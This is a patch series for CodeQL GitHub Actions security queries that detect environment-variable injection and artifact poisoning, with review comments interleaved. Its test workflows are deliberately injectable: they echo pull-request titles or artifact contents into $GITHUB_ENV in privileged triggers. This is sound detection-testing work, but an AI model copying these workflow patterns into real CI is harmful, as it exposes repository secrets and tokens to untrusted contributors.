From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 23 Mar 2024 21:55:49 +0100 Subject: [PATCH 0137/1267] env var injection query --- .../actions/security/EnvVarInjectionQuery.qll | 36 +++++++++ ql/src/Security/CWE-077/EnvVarInjection.ql | 23 ++++++ .../CWE-077/PrivilegedEnvVarInjection.ql | 26 +++++++ .../CWE-077/.github/workflows/test1.yml | 25 +++++++ .../CWE-077/.github/workflows/test2.yml | 73 +++++++++++++++++++ .../CWE-077/.github/workflows/test3.yml | 64 ++++++++++++++++ .../Security/CWE-077/EnvVarInjection.qlref | 1 + .../CWE-077/PrivilegedEnvVarInjection.qlref | 1 + .../CWE-094/.github/workflows/inter-job0.yml | 4 +- 9 files changed, 251 insertions(+), 2 deletions(-) create mode 100644 ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll create mode 100644 ql/src/Security/CWE-077/EnvVarInjection.ql create mode 100644 ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll new file mode 100644 index 00000000000..dbae3f48f80 --- /dev/null +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
@@ -0,0 +1,36 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+predicate writeToGithubEnvSink(DataFlow::Node sink) {
+ exists(Expression expr, Run run, string script, string line, string value |
+ script = run.getScript() and
+ line = script.splitAt("\n") and
+ value = line.regexpCapture("echo\\s+.*\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and
+ expr = sink.asExpr() and
+ run.getAnScriptExpr() = expr and
+ value.indexOf(expr.getRawExpression()) > 0
+ )
+}
+
+private class EnvVarInjectionSink extends DataFlow::Node {
+ EnvVarInjectionSink() {
+ writeToGithubEnvSink(this) or
+ externallyDefinedSink(this, "envvar-injection")
+ }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate an environment variable.
+ */
+private module EnvVarInjectionConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */
+module EnvVarInjectionFlow = TaintTracking::Global;
diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql
new file mode 100644
index 00000000000..2e978ad9e53
--- /dev/null
+++ b/ql/src/Security/CWE-077/EnvVarInjection.ql
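Review bot: In `writeToGithubEnvSink`, the test `value.indexOf(expr.getRawExpression()) > 0` skips an expression that sits at the very start of the captured value, because `indexOf` is zero-based. Assuming `getRawExpression()` returns the full `${{ … }}` text, a step such as `echo NAME=${{ … }} >> $GITHUB_ENV` would then never become a sink; `value.indexOf(expr.getRawExpression()) >= 0` covers it. The pattern also requires a bare `$GITHUB_ENV`, so a write to a quoted `"$GITHUB_ENV"` looks like it is missed; making the quote optional (`>>\\s*\"?\\$GITHUB_ENV`) would bring it in line with the quoted `"$GITHUB_OUTPUT"` form mentioned in FlowSteps.qll.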
@@ -0,0 +1,23 @@
+/**
+ * @name Enviroment Variable built from user-controlled sources
+ * @description Building an environment variable from user-controlled sources may alter the execution of following system commands
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/envvar-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-077
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.security.EnvVarInjectionQuery
+import EnvVarInjectionFlow::PathGraph
+
+from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink
+where EnvVarInjectionFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential environment variable injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
new file mode 100644
index 00000000000..bce9494a43f
--- /dev/null
+++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
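Review bot: The `@name` in the query header is misspelled (`Enviroment`), and the identical string is reused for `actions/privileged-envvar-injection` in PrivilegedEnvVarInjection.ql, so the two alerts cannot be told apart by name in a results list. I would use `@name Environment variable built from user-controlled sources` here and append something like `in a privileged workflow` to the name in the other file. The two headers also write `@security-severity` in different formats (`5.0` and `9`); `9.0` would match.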
@@ -0,0 +1,26 @@
+/**
+ * @name Enviroment Variable built from user-controlled sources
+ * @description Building an environment variable from user-controlled sources may alter the execution of following system commands
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/privileged-envvar-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-077
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.security.EnvVarInjectionQuery
+import EnvVarInjectionFlow::PathGraph
+
+from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w
+where
+ EnvVarInjectionFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+select sink.getNode(), source, sink,
+ "Potential privileged environment variable injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
new file mode 100644
index 00000000000..b2780d54c04
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
@@ -0,0 +1,25 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+ branches:
+ - main
+ - 14.0.x
+
+ types:
+ - opened
+ - reopened
+
+jobs:
+ updateJira:
+ if: github.actor != 'dependabot[bot]'
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v4
+
+ - name: Extract Jira Key
+ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml
new file mode 100644
index 00000000000..e71178c4ad6
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml 
@@ -0,0 +1,73 @@ +# https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0 +# https://github.com/firebase/friendlyeats-web/commit/df65aefd24cf6f092a27a5576067ff9f29aa2ef1 +name: Deploy Preview +on: + workflow_run: + workflows: ["Generate Preview"] + types: + - completed + +jobs: + deploy: + runs-on: ubuntu-latest + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchPrArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr" + })[0]; + var matchPreviewArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "preview" + })[0]; + var downloadPr = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPrArtifact.id, + archive_format: 'zip', + }); + var downloadPreview = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPreviewArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); + fs.writeFileSync('${{github.workspace}}/firestore-web.zip', Buffer.from(downloadPreview.data)); + - run: | + unzip pr.zip + echo "pr_number=$(cat NR)" >> $GITHUB_ENV + mkdir firestore-web + unzip firestore-web.zip -d firestore-web + - name: Deploy preview + id: deploy_preview + uses: FirebaseExtended/action-hosting-deploy@v0 + with: + repoToken: '${{ secrets.GITHUB_TOKEN }}' + firebaseServiceAccount: '${{ secrets.FIREBASE_SERVICE_ACCOUNT_FIR_CODELABS_89252 }}' + projectId: fir-codelabs-89252 + entryPoint: firestore-web + channelId: 
firestore-web-${{ env.pr_number }} + env: + FIREBASE_CLI_PREVIEWS: hostingchannels + - name: Write Comment + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: ${{ env.pr_number }}, + body: 'View preview ${{ steps.deploy_preview.outputs.details_url }}' + }); diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml new file mode 100644 index 00000000000..2f76d4a3042 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml 
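Review bot: The only `$GITHUB_ENV` write in this fixture, `echo "pr_number=$(cat NR)" >> $GITHUB_ENV`, takes its value from a file unpacked from a downloaded artifact, not from a `${{ }}` expression. As far as the EnvVarInjectionQuery.qll hunk in this commit shows, the sink predicate only matches lines whose echoed value contains an expression, so this workflow probably produces no result, and the commit adds no `.expected` file that would record that. A comment on that line, for example `# artifact-derived value: not detected by envvar-injection yet`, would make clear whether the miss is intended. The same applies to the three `echo "PR_…=$(cat …)"` lines in test3.yml.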
@@ -0,0 +1,64 @@ +# https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project +# https://github.com/google/orbit/commit/6cd71a3f1eec098d0de61bf9bb742737cb3aa5fa +name: report-checks +on: + workflow_run: + workflows: ['checks'] + types: + - completed +permissions: read-all +jobs: + + report-clang-tidy-diff: + permissions: + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Download PR metadata + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: pr_metadata + if_no_artifact_found: 'ignore' + - name: Download clang_tidy_fixes + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: clang_tidy_fixes + if_no_artifact_found: 'ignore' + - name: Set found_files + id: set_found_files + run: | + if [ -f clang-tidy-fixes.yml ] && [ -f pr_number.txt ] && [ -f pr_head_repo.txt ] && [ -f pr_head_ref.txt ]; then + echo "found_files=true" >> $GITHUB_OUTPUT + else + echo "found_files=false" >> $GITHUB_OUTPUT + fi + - run: | + echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV + echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV + if: steps.set_found_files.outputs.found_files == 'true' + - uses: actions/checkout@v3 + if: steps.set_found_files.outputs.found_files == 'true' + with: + repository: ${{ env.PR_HEAD_REPO }} + ref: ${{ env.PR_HEAD_REF }} + persist-credentials: false + - name: Redownload clang_tidy_fixes + if: steps.set_found_files.outputs.found_files == 'true' + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + 
workflow_conclusion: '' + name: clang_tidy_fixes + if_no_artifact_found: 'ignore' + - uses: platisd/clang-tidy-pr-comments@89ea1b828cdac1a6ec993d225972adea3b8841b6 + if: steps.set_found_files.outputs.found_files == 'true' + with: + github_token: ${{ secrets.ORBITPROFILER_BOT_PAT }} + clang_tidy_fixes: clang-tidy-fixes.yml + pull_request_id: ${{ env.PR_NUMBER }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref new file mode 100644 index 00000000000..dafc2b38fc4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref new file mode 100644 index 00000000000..4562004b990 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/PrivilegedEnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 5ad00b17db9..d656fb65ea5 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -1,4 +1,4 @@ -jn: push +on: push jobs: job0: @@ -36,7 +36,7 @@ jobs: if: ${{ always() }} - needs: job1 + needs: job steps: - id: sink From bdfd46111fb7823a61113045af6bda60031748bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:51:26 +0200 Subject: [PATCH 0138/1267] Only triggered on non-pull_request events --- ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) 
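Review bot: `needs: job` in the second inter-job0.yml hunk names a job that is not visible in either hunk, while the CWE-094 expected output earlier in this series still lists a sink on `needs.job1.outputs.job_output` for this file. If this is a deliberate negative case (no dependency on `job1`, so no flow should be reported), a comment such as `needs: job # intentionally not job1` would say so; if it is a typo, it silently changes what the fixture tests. This commit does not touch the matching `.expected` files, so the recorded results may no longer correspond to the workflow. The job body continues outside the hunk.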
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index bce9494a43f..6508b458629 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,11 +16,16 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w where EnvVarInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 9807cf87d52df816ec38ba35833687b4abf6ef12 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:52:46 +0200 Subject: [PATCH 0139/1267] resolve conflicts --- ql/lib/ext/trilom_file-changes-action.model.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 ql/lib/ext/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml new file mode 100644 index 00000000000..db3d3759782 --- /dev/null +++ b/ql/lib/ext/trilom_file-changes-action.model.yml 
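Review bot: `isSingleTriggerWorkflow` has no QLDoc, and the `where` clause now reports every workflow that is not triggered by `pull_request` alone, which is a broader reading of "privileged" than the query header describes. I would add a QLDoc comment stating that the predicate holds when `trigger` is the only event that triggers `w`, and a line comment at `not isSingleTriggerWorkflow(w, "pull_request")` explaining why mixed-trigger workflows (for example `pull_request` plus `push`) are meant to be reported. The aggregate can also be shortened to `count(w.getATriggerEvent()) = 1`.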
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/trilom/file-changes-action + # if `prNumber` is provided, the trigger event dont need to be `pull_request_target` + - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"] From cc16318a9062fd05027fe4827d25bd9d84b0c7e3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 10:56:03 +0200 Subject: [PATCH 0140/1267] Make new trilom source compliant with new sources --- ql/lib/ext/trilom_file-changes-action.model.yml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index db3d3759782..77706e266fe 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml 
@@ -3,9 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - # https://github.com/trilom/file-changes-action - # if `prNumber` is provided, the trigger event dont need to be `pull_request_target` - - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files"] From 152d29da3859d054b46eb09f17a17b849fa79cd9 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Apr 2024 18:53:37 +0200 Subject: [PATCH 0141/1267] Add Artifact poisoning and Env Injection queries --- ql/lib/codeql/actions/Ast.qll | 6 ++- ql/lib/codeql/actions/ast/internal/Ast.qll | 26 ++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 10 ++-- .../dataflow/internal/DataFlowPrivate.qll | 20 +++++++- .../security/ArtifactPoisoningQuery.qll | 50 +++++++++++++++++++ .../actions/security/EnvVarInjectionQuery.qll | 11 ++-- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 26 ++++++++++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 2 +- .../CWE-077/.github/workflows/test1.yml | 2 + .../Security/CWE-077/EnvVarInjection.expected | 6 +++ .../PrivilegedEnvVarInjection.expected | 6 +++ .../CWE-094/.github/workflows/inter-job0.yml | 2 +- .../CWE-094/.github/workflows/test1.yml | 27 ++++++++++ .../Security/CWE-094/CodeInjection.expected | 6 +++ .../CWE-094/PrivilegedCodeInjection.expected | 6 +++ .../.github/workflows/artifactpoisoning1.yml | 34 +++++++++++++ .../.github/workflows/artifactpoisoning2.yml | 21 ++++++++ .../.github/workflows/artifactpoisoning3.yml | 19 +++++++ .../.github/workflows/artifactpoisoning4.yml | 25 ++++++++++ .../CWE-829/.github/workflows/test1.yml | 27 ++++++++++ .../CWE-829/ArtifactPoisoning.expected | 4 ++ .../Security/CWE-829/ArtifactPoisoning.qlref | 2 + .../CWE-829/UnpinnedActionsTag.expected | 1 + 23 files changed, 313 insertions(+), 26 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml create mode 100644 
ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ecc0ad16f5f..d865eb54905 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -38,7 +38,9 @@ class AstNode instanceof AstNodeImpl { Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } -class ScalarValue extends AstNode instanceof ScalarValueImpl { } +class ScalarValue extends AstNode instanceof ScalarValueImpl { + string getValue() { result = super.getValue() } +} class Expression extends AstNode instanceof ExpressionImpl { string expression; @@ -218,6 +220,8 @@ abstract class Uses extends AstNode instanceof UsesImpl { string getVersion() { result = super.getVersion() } + string getArgument(string argName) { result = super.getArgument(argName) } + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 3fa1769e762..a1470a41dd0 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -128,6 +128,8 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { override Location getLocation() { result = value.getLocation() } override YamlScalar getNode() { result = value } + + string getValue() { result = value.getValue() } } class ExpressionImpl extends AstNodeImpl, TExpressionNode { 
@@ -687,7 +689,19 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); - abstract ExpressionImpl getArgumentExpr(string key); + /** Gets the argument expression for the given key. */ + string getArgument(string key) { + exists(ScalarValueImpl scalar | + scalar.getNode() = this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) and + result = scalar.getValue() + ) + } + + /** Gets the argument expression for the given key (if it exists). */ + ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = + this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) + } } /** @@ -719,11 +733,6 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } - /** Gets the argument expression for the given key. */ - override ExpressionImpl getArgumentExpr(string key) { - result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) - } - override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } @@ -763,11 +772,6 @@ class ExternalJobImpl extends JobImpl, UsesImpl { else none() ) } - - /** Gets the argument expression for the given key. */ - override ExpressionImpl getArgumentExpr(string key) { - result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) - } } class RunImpl extends StepImpl { diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index c10334436aa..34357816812 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
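Review bot: The doc comment added above `getArgument` in `UsesImpl` is a copy of the one on `getArgumentExpr` ("Gets the argument expression for the given key"), but this predicate returns the string value of the scalar found under `with:`, not an expression. I would reword it to `/** Gets the string value of the argument with the given key, if it is a scalar. */` so callers can tell the two accessors apart. The public `getValue` and `getArgument` wrappers added to Ast.qll in this commit have no QLDoc either and could carry the same one-line descriptions. The enclosing class starts outside the hunk.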
@@ -33,12 +33,12 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ -predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run r, string varName, string output | +predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getInScopeEnvVarExpr(varName) = pred.asExpr() and + run.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript() and + script = run.getScript() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or @@ -46,6 +46,6 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data ) and line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and - succ.asExpr() = r + succ.asExpr() = run ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 11b8bf94bca..b5123069f13 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
@@ -232,8 +232,24 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) + or astTo.getTarget() = astFrom + or + // e.g: + // - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + // - run: echo ${{ env.ISSUE_KEY }} + exists(Run run, string script, Expression expr, string line, string key, string value | + run.getScript() = script and + run.getAnScriptExpr() = expr and + line = script.splitAt("\n") and + key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + value.indexOf(expr.getRawExpression()) > 0 and + key = astTo.getFieldName() and + expr = astFrom and + expr.getEnclosingWorkflow() = run.getEnclosingWorkflow() + ) ) ) } @@ -312,7 +328,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or externallyDefinedStoreStep(node1, node2, c) or - runEnvToScriptStoreStep(node1, node2, c) + envToOutputStoreStep(node1, node2, c) } /** diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll new file mode 100644 index 00000000000..abf36fd7da3 --- /dev/null +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
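Review bot: In the new `$GITHUB_ENV` branch of `envCtxLocalStep`, the only thing tying `astTo` to the write is `key = astTo.getFieldName()`. The workflow equality is placed on `expr`, which is already bound to `run` through `run.getAnScriptExpr()`. Unless a constraint outside the hunk limits `astTo`, a read of `env.KEY` in a different workflow file, another job, or a step that runs before the write would receive taint; something like `astTo.getEnclosingWorkflow() = run.getEnclosingWorkflow()` (ideally same job, later step) looks intended. Separately, `value.indexOf(expr.getRawExpression()) > 0` rejects an expression at offset 0 of the captured value, so a line of the form `echo KEY=${{ ... }} >> $GITHUB_ENV` appears to produce no step; `exists(value.indexOf(expr.getRawExpression()))` covers both positions. The same comparison is a context line in `writeToGithubEnvSink` in EnvVarInjectionQuery.qll, and the added test only exercises the `$(echo "${{ ... }}")` form.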
@@ -0,0 +1,50 @@ +import actions + +class ArtifactDownloadStep extends Step { + ArtifactDownloadStep() { + // eg: - uses: dawidd6/action-download-artifact@v2 + this.(UsesStep).getCallee() = "dawidd6/action-download-artifact" and + // exclude downloads outside the current directory + // TODO: add more checks to make sure the artifacts can be controlled + not exists(this.(UsesStep).getArgumentExpr("path")) + or + // eg: + // - uses: actions/github-script@v6 + // with: + // script: | + // let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + // owner: context.repo.owner, + // repo: context.repo.repo, + // run_id: context.payload.workflow_run.id, + // }); + // let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + // return artifact.name == "" + // })[0]; + // let download = await github.rest.actions.downloadArtifact({ + // owner: context.repo.owner, + // repo: context.repo.repo, + // artifact_id: matchArtifact.id, + // archive_format: 'zip', + // }); + this.(UsesStep).getCallee() = "actions/github-script" and + exists(string script | + this.(UsesStep).getArgument("script") = script and + script.matches("%listWorkflowRunArtifacts(%") and + script.matches("%downloadArtifact(%") + ) + or + // eg: - run: gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + this.(Run).getScript().splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") + or + // eg: + // run: | + // artifacts_url=${{ github.event.workflow_run.artifacts_url }} + // gh api "$artifacts_url" -q '.artifacts[] | 